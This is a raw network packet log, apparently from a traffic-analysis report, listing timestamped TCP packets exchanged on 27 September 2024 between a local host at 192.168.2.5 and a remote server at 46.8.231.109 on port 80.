Sep 27, 2024 00:15:06.724103928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724118948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724136114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724147081 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724168062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724180937 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724200010 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724214077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724231958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724240065 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724267006 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724282980 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724299908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724313021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724333048 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724348068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724380016 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724394083 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724411964 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724421978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724442959 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724455118 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724476099 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724490881 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724508047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724523067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724540949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724560022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724571943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724589109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724602938 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724613905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724636078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.724653006 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.724682093 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806333065 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806395054 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806431055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806432009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806456089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806463003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806467056 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806514978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806519985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806566000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806571960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806598902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806622982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806631088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806648016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806663036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806668043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806694031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806726933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806735992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806735992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806759119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806770086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806791067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806823015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806827068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806854963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806854963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806854963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806889057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.806891918 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.806936979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807466984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807498932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807526112 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807531118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807540894 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807563066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807595968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807611942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807611942 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807629108 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807658911 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807660103 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807674885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807693958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807718992 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807745934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807775974 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807780981 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807797909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807843924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807917118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807949066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.807985067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.807985067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808000088 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808032990 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808063984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808068037 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808095932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808109999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808109999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808128119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808151007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808159113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808204889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808204889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808208942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808242083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808274031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808281898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808306932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808310986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808310986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808340073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808352947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808373928 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.808387995 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808463097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.808968067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809000969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809027910 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809039116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809051037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809082031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809103012 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809113979 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809132099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809146881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809160948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809181929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809199095 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809251070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809283018 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809298038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809298038 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809314013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809329033 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809345007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809376955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809390068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809390068 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809407949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809439898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809441090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809463978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809473038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809495926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809506893 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809546947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809546947 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809600115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809632063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809673071 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809673071 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809680939 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809712887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809743881 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809756041 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809756994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809776068 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809807062 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809808969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809808969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809838057 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809870005 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809880018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809880018 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809900999 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809922934 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809932947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809966087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.809969902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.809997082 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810004950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810004950 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810029984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810061932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810065031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810065031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810094118 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810120106 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810126066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810129881 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810158014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810184002 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810269117 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810529947 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810561895 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810606003 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810606003 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810611963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810643911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810666084 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810677052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810698986 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810708046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810728073 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810741901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810767889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810796976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810808897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810846090 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810862064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810878992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810910940 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810926914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810926914 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810941935 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.810969114 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.810973883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811005116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811007023 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811036110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811043024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811055899 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811075926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811105013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811125994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811192989 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811227083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811259031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811275959 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811275959 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811290026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811321020 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811321974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811352968 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811364889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811364889 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811403036 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811410904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811441898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811455011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811475039 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811511993 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811526060 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811932087 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811964035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.811991930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811991930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.811994076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.812026978 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.812058926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.812071085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.812071085 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.812089920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.812108994 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.812122107 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.812151909 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.812154055 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.812172890 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.812187910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:06.812212944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:06.812222004 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.065857887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.065907955 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.065934896 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.065952063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.065959930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.065973043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.065987110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.065994978 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066010952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066031933 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066035986 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066049099 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066061020 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066085100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066085100 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066121101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066121101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066144943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066169024 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066173077 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066186905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066195011 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066220045 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066237926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066237926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066243887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066262960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066268921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066293001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066310883 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066310883 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066317081 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066344023 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066358089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066358089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066452026 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066879034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066903114 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066927910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.066939116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.066939116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067029953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067064047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067087889 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067105055 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067111969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067133904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067150116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067173958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067193031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067193031 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067198038 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067223072 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067245007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067245007 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067246914 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067270041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067292929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067292929 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067292929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067318916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067336082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067336082 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067342043 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067367077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067382097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067382097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067408085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067414999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067433119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067456961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067476034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067476034 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067481041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067504883 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067513943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067528009 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067528963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067553997 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.067569017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067569017 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.067579031 CEST	80	49708	46.8.231.109	192.168.2.5
